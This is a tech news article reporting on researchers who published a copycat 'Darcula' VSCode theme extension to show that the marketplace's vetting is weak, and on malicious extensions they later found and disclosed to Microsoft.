HomeWinBuzzer NewsSecurity Flaws in Microsoft VSCode Marketplace Impact over 100 Organizations

Security Flaws in Microsoft VSCode Marketplace Impact over 100 Organizations

Researchers have discovered 1,283 known-malicious extensions, many of them communicating with hardcoded IPs, launching unknown executables,, and copycat extensions.

-

Israeli cybersecurity experts have found concerning vulnerabilities in the Visual Studio Code (VSCode) Marketplace, revealing that over 100 organizations were affected by a trojanized extension. The researchers, Amit Assaraf, Itay Kruk, and Idan Dardikman, showed how dangerous extensions could harvest sensitive system data undetected.

The VSCode Marketplace is an online platform provided by Microsoft where users can discover, download, and install extensions to enhance the functionality of its popular source code editor, Visual Studio Code.

To demonstrate their findings, they crafted a misleading extension that impersonated the popular Dracula Official‘ theme, totalling over 7 million installations. They named their version ‘Darcula‘, creating a replica domain to boost its credibility. This malicious extension included a script to extract system details such as hostname, installed extensions count, domain name, and operating system, sending the data via HTTPS POST requests to a server.

Evading Detection Mechanisms

Standard endpoint detection and response (EDR) tools did not detect the activity of the ‘Darcula‘ extension. Due to VSCode’s design, which allows reading of various files, execution of commands, and generation of child processes, these actions remained unflagged. Notably, the extension was installed by targets like a public company with a $483 billion market cap, key security firms, and a national judicial network. The team ensured non-destructiveness by just collecting identifying information and making disclosures in the documentation.

Using a tool named ‘ExtensionTotal,’ the researchers scrutinized the VSCode Marketplace. They discovered 1,283 known-malicious extensions, 8,161 communicating with hardcoded IPs, 1,452 launching unknown executables, and 2,304 copycat extensions. One particularly harmful extension was capable of opening a reverse shell to a cybercriminal’s server.

The team published their harmful extension within just 30 minutes. This extension not only changed the IDE’s appearance but also leaked source code to a remote server. It soon gained popularity, trending on the VSCode Marketplace, which enjoys 4.5 million monthly views. Within a day, over 100 victims had installed it, including devices at multi-billion dollar companies, top security firms, and a country’s justice court network.

Reporting and Prevention

The researchers notified Microsoft of all identified malicious extensions for removal, though many remain accessible. They are set to release ‘ExtensionTotal’ as a free tool for developers to check for possible threats within their environments. Microsoft has not yet responded to inquiries about strengthening the security of the VSCode Marketplace.

After identifying numerous similar vulnerabilities, they committed to responsible disclosure, working with more than ten multi-billion dollar companies to reduce this security risk.

Last Updated on November 7, 2024 7:46 pm CET

Markus Kasanmascheff
Markus Kasanmascheff
Markus has been covering the tech industry for more than 15 years. He is holding a Master´s degree in International Economics and is the founder and managing editor of Winbuzzer.com.

Recent News

0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Newest
Oldest Most Voted
Inline Feedbacks
View all comments
0
We would love to hear your opinion! Please comment below.x
()
x
Mastodon